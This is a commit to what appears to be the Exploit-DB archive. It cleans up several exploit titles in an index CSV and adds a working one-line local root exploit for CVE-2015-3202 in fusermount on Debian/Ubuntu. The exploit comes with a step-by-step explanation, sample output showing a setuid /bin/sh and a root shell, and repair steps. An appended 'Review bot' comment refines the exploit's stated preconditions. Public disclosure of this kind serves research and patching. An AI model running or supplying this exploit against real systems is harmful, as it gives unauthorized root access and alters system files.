DB: 2015-05-24
1 new exploit
This commit is contained in:
parent
a959c54c79
commit
05862802e3
2 changed files with 105 additions and 6 deletions
13
files.csv
13
files.csv
|
@ -17687,7 +17687,7 @@ id,file,description,date,author,platform,type,port
|
|||
20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0
|
||||
20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20360,platforms/php/webapps/20360.py,"wordpress postie plugin 1.4.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0
|
||||
20361,platforms/php/webapps/20361.py,"wordpress simplemail plugin 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0
|
||||
20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
|
@ -21865,7 +21865,7 @@ id,file,description,date,author,platform,type,port
|
|||
24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0
|
||||
24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0
|
||||
24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0
|
||||
24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
|
||||
24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
|
||||
24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0
|
||||
24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0
|
||||
24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0
|
||||
|
@ -23681,8 +23681,8 @@ id,file,description,date,author,platform,type,port
|
|||
26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0
|
||||
26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service Vulnerability",2005-11-22,"Janis Vizulis",hardware,dos,0
|
||||
26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.PHP Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0
|
||||
26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0
|
||||
26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0
|
||||
|
@ -27061,7 +27061,7 @@ id,file,description,date,author,platform,type,port
|
|||
29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0
|
||||
29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
|
||||
29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0
|
||||
29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
|
||||
29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
|
||||
29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0
|
||||
29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0
|
||||
29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0
|
||||
|
@ -33152,7 +33152,7 @@ id,file,description,date,author,platform,type,port
|
|||
36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0
|
||||
36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
|
||||
36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0
|
||||
36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36746,platforms/linux/local/36746.c,"Apport/Abrt - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
|
||||
36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
|
||||
|
@ -33471,3 +33471,4 @@ id,file,description,date,author,platform,type,port
|
|||
37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
|
||||
37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
|
||||
37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
|
||||
37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
|
||||
|
|
|
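--- a/platforms/linux/local/37089.txt
+++ b/platforms/linux/local/37089.txt
@@ -0,0 +1,98 @@
+Source: https://gist.github.com/taviso/ecb70eb12d461dd85cba
+Tweet: https://twitter.com/taviso/status/601370527437967360
+
+
+
+# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
+
+12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+
+# Here's how it works, $a holds the name of a shellscript to be executed as
+# root.
+a=/tmp/.$$;
+
+# $b is used twice, first to build the contents of shellscript $a, and then as
+# a command to make $a executable. Quotes are unused to save a character, so
+# the seperator must be escaped.
+b=chmod\ u+sx;
+
+# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
+# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
+# and dont make it drop privileges.
+#
+# http://www.openwall.com/lists/oss-security/2013/08/22/12
+#
+echo $b /bin/sh>$a;
+
+# Now make the $a script executable using the command in $b. This needlessly
+# sets the setuid bit, but that doesn't do any harm.
+$b $a;
+
+# Now make $a the directory we want fusermount to use. This directory name is
+# written to an arbitrary file as part of the vulnerability, so needs to be
+# formed such that it's a valid shell command.
+a+=\;$a;
+
+# Create the mount point for fusermount.
+mkdir -p $a;
+
+# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
+# /bin/mount so that it can use privileged mount options that are normally
+# restricted if ruid != euid. That's acceptable (but scary) in theory, because
+# fusermount can sanitize the call to make sure it's safe.
+#
+# However, because mount thinks it's being invoked by root, it allows
+# access to debugging features via the environment that would not normally be
+# safe for unprivileged users and fusermount doesn't sanitize them.
+#
+# Therefore, the bug is that the environment is not cleared when calling mount
+# with ruid=0. One debugging feature available is changing the location of
+# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
+# files.
+#
+# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
+# current shell from $0...so it only works if you're using bash!).
+#
+# The line written by fusermount will look like this:
+#
+# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
+#
+# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because
+# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
+# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
+# next time root logs in.
+#
+# Another way to exploit it would be overwriting /etc/default/locale, then
+# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
+# wouldn't have to log in, but you would have to wait around until midnight to
+# check if it worked.
+#
+# And we have enough characters left for a hash tag/comment.
+LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+
+# Here is how the exploit looks when you run it:
+#
+# $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
+# fusermount: failed to open /etc/fuse.conf: Permission denied
+# sending file descriptor: Socket operation on non-socket
+# $ cat /etc/bash.bashrc
+# /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0
+#
+# Now when root logs in next...
+# $ sudo -s
+# bash: /dev/fuse: Permission denied
+# # ls -Ll /bin/sh
+# -rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/sh
+# # exit
+# $ sh -c 'id'
+# euid=0(root) groups=0(root)
+#
+# To repair the damage after testing, do this:
+#
+# $ sudo rm /etc/bash.bashrc
+# $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash
+# $ sudo chmod 0755 /bin/sh
+# $ sudo umount /tmp/.$$\;/tmp/.$$
+# $ rm -rf /tmp/.$$ /tmp/.$$\;
+#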
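Review bot: The precondition stated in the comment "so it only works if you're using bash!" (the `/etc/$0.$0rc` expansion of LIBMOUNT_MTAB) is narrower than written: `$0` has to expand to exactly `bash`, and in a login shell bash typically reports `-bash`, while inside a script `$0` is the script path, so the write would land on a harmless name such as `/etc/-bash.-bashrc` and the PoC silently does nothing. I would sharpen that comment to `# $0 must expand to exactly "bash": a login shell (-bash) or a script ($0 = path) gives a useless target, so type this at an interactive non-login bash prompt`. A second line worth adding near the LIBMOUNT_MTAB invocation is that the test as published is destructive on a real host (it clobbers /etc/bash.bashrc and leaves /bin/sh setuid until the repair steps at the end are run), so it should only be run on a disposable VM. The fix itself is correct for what it claims; the two sentences above would save a tester a confusing "it ran but nothing happened" hour.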